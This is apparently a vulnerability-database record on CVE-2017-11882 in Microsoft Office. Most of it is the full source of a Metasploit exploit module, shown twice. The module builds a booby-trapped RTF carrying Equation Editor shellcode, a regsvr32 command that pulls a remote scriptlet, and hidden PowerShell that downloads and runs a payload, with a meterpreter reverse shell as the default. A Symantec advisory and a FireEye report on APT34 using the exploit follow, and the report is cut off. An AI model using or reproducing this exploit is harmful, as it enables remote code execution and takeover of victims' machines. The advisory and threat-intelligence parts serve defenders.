\"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << 
'00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << 
\"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? 
\"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-22T20:34:12", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "2017-11-21T19:47:02", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. 
The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = 
retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << 
'0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << 
'0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << 
\"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << 
'00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << 
\"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? 
\"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-14T17:01:30", "bulletinFamily": "software", "cvelist": ["CVE-2017-11882"], "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101757", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101757", "type": "symantec", "title": "Microsoft Office CVE-2017-11882 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "description": "Less than a week after Microsoft issued a patch for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.\n\nWe believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. 
We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.\n\nAPT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a [spear phishing campaign](<https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html>) targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>).\n\nIn this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.\n\nThe full report on APT34 is available to our [MySIGHT customer community](<https://www.fireeye.com/products/isight-cyber-threat-intelligence-subscriptions.html>). APT34 loosely aligns with [public reporting related to the group \"OilRig\"](<https://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/>). 
